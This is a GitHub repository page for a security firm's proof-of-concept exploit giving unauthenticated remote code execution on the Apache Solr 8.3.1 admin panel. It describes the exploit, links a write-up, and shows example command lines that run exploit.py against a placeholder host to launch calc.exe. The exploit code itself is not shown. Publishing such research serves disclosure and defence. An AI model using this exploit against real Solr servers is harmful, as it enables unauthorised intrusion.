Skip to content

scrt/Apache-Solr-8.3.1-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Apache Solr 8.3.1 admin panel RCE (Windows)

Description:

This exploit allows code execution without any prior authentication on a default Solr admin panel.

Authors:

  • Nicolas Brunner - SCRT

Writeup

https://blog.scrt.ch/2023/05/01/solr-rce-from-exposed-administration-interface/

PoC:

Examples:

If no core exists, create the core from the default folder:
./exploit.py -u http://example.com/solr --default-core -c core_123
Using the existing core named core_123, create a new vulnerable core and execute calc.exe:
./exploit.py -u http://example.com/solr -f calc.xml -c core_123

Installation:

Installation of the required python libraries
pip3 install -r requirements.txt

About

RCE on Apache Solr 8.3.1

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages